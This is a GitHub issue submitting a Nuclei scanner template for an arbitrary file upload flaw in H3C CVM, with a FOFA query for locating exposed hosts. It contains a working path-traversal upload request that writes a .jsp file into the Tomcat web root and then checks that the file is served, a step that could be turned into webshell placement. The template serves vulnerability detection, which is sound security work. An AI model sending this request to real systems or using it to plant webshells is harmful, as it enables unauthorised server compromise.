### ISSUE TITLE
H3C CVM - Arbitrary File Upload

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7980]
### Template Information:

H3C CVM - Arbitrary File Upload
fofa: server="H3C-CVM" || (banner="H3C-CVM" && banner="Server: ")

### Nuclei Template:

```yaml
id: h3c-cvm-arbitrary-file-upload

info:
  name: H3C CVM - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: H3C CVM 存在任意文件上传漏洞，攻击者可以上传任意文件，获取 webshell，控制服务器权限，读取敏感信息等。
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: h3c,cvm

http:
  - raw:
      - |
        POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{randstr_1}}.jsp&name=222" HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-10/20
        Accept-Encoding: gzip, deflate
        Content-type: 
        Accept-Language: zh-CN,zh;q=0.9
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

        {{randstr_2}}

  - raw:
      - |
        GET /cas/js/lib/buttons/{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "{{randstr_2}}"

      - type: status
        status:
          - 200
```
